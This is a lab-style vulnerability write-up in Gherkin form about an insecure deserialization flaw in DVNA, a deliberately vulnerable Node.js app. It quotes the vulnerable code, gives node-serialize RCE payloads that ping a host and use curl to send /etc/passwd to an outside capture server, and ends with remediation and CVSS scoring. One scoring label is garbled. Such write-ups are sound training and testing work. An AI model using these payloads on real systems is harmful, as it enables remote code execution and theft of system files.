## Version 1.4.2
## language: en

Feature:
  TOE:
    DVNA
  Category:
    Remote Code Execution
  Location:
    http://localhost:8000/app/bulkproductslegacy - Serialized Object
  CWE:
    CWE-0502: Deserialization of Untrusted Data -variant-
      https://cwe.mitre.org/data/definitions/502.html
    CWE-0915: Improperly Controlled Modification of Dynamically-Determined
    Object Attributes -base-
      https://cwe.mitre.org/data/definitions/915.html
    CWE-0913: Improper Control of Dynamically-Managed Code Resources -class-
      https://cwe.mitre.org/data/definitions/913.html
    CWE-1019: Validate Inputs -category-
      https://cwe.mitre.org/data/definitions/1019.html
  CAPEC:
    CAPEC-586: Object Injection -meta-
      http://capec.mitre.org/data/definitions/586.html
  Rule:
    REQ.173: https://fluidattacks.com/web/es/rules/173/
  Goal:
    Execute arbitrary code in the server
  Recommendation:
    Never deserialize user-controlled data

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
  TOE information:
    Given I am running DVNA in a docker container at
    """
    http://localhost:8000/
    """

  Scenario: Normal use case
  Normal site navigation
    Given I go to http://localhost:8000/
    Then I can navigate the site

  Scenario: Static detection
  No access control
    Given I see the code at "dvna/routes/appHandler.js"
    """
    215 module.exports.bulkProductsLegacy = function (req,res){
    216   // TODO: Deprecate this soon
    217   if(req.files.products){
    218     var products = serialize.unserialize(req.files.products.data.toStrin
    g('utf8'))
    219     products.forEach( function (product) {
    220       var newProduct = new db.Product()
    221       newProduct.name = product.name
    222       newProduct.code = product.code
    223       newProduct.tags = product.tags
    224       newProduct.description = product.description
    225       newProduct.save()
    226     })
    227     res.redirect('/app/products')
    228   }else{
    229     res.render('app/bulkproducts',{messages:{danger:'Invalid file'},lega
    cy:true})
    230   }
    231 }
    """
    Then I see it deserializes whatever string it's passed

  Scenario: Dynamic detection
  Checking default routes
    Given I go to "http://localhost:8000/app/bulkproducts?legacy=true"
    Then I can upload a json file defining products
    """
    [{"name":"Xbox 360","code":"15","tags":"gaming console","description":"Micro
    soft's flagship gaming console"},{"name":"Playstation 3","code":"17","tags":
    "gaming console","description":"Sony's flagshipgaming console"}]
    """
    Then I try sending a serialized function that pings a machine I control
    """
    {"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('ping 172.17.
    0.1', function(error, stdout, stderr) { console.log(stdout) });}()"}
    """
    And run a tcpdump in my machine to see if the code is run
    """
    ➜  ~ tcpdump icmp -i docker0
    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
    listening on docker0, link-type EN10MB (Ethernet), capture size 262144 bytes
    15:24:29.454962 IP 172.17.0.2 > kalisg: ICMP echo request, id 45, seq 229, l
    ength 64
    15:24:29.455031 IP kalisg > 172.17.0.2: ICMP echo reply, id 45, seq 229, len
    gth 64
    15:24:30.478914 IP 172.17.0.2 > kalisg: ICMP echo request, id 45, seq 230, l
    ength 64
    15:24:30.478975 IP kalisg > 172.17.0.2: ICMP echo reply, id 45, seq 230, len
    gth 64
    ...
    """
    Then I know the server is running the deserialized code

  Scenario: Exploitation
  Exfiltrating sensitive data
    Given I can run arbitrary commands in the server
    Then I send a payload to POST "/etc/passwd" to a server I control
    """
    {"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('curl -F shl=
    @/etc/passwd https://ptsv2.com/t/c4t9j-1548448889/post', function(error, std
    out, stderr) { console.log(stdout) });}()"}
    """
    And get the contents of "/etc/passwd" in my server [evidence](passwd.png)

  Scenario: Remediation
  Access control
    Given I don't deserialize user-controlled objects
    And find another method to import products in bulk
    Then RCE isn't posible anymore

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    9.9/10 (Critical) - AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/
  Temporal: Attributes that measure the exploit's popularity and fixability
    9.2/10 (Critical) - E:F/RL:O/RC:C/
  En4.9onmental: Unique and relevant attributes to a specific user environment
    9.2/10 (Critical) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2019-01-25
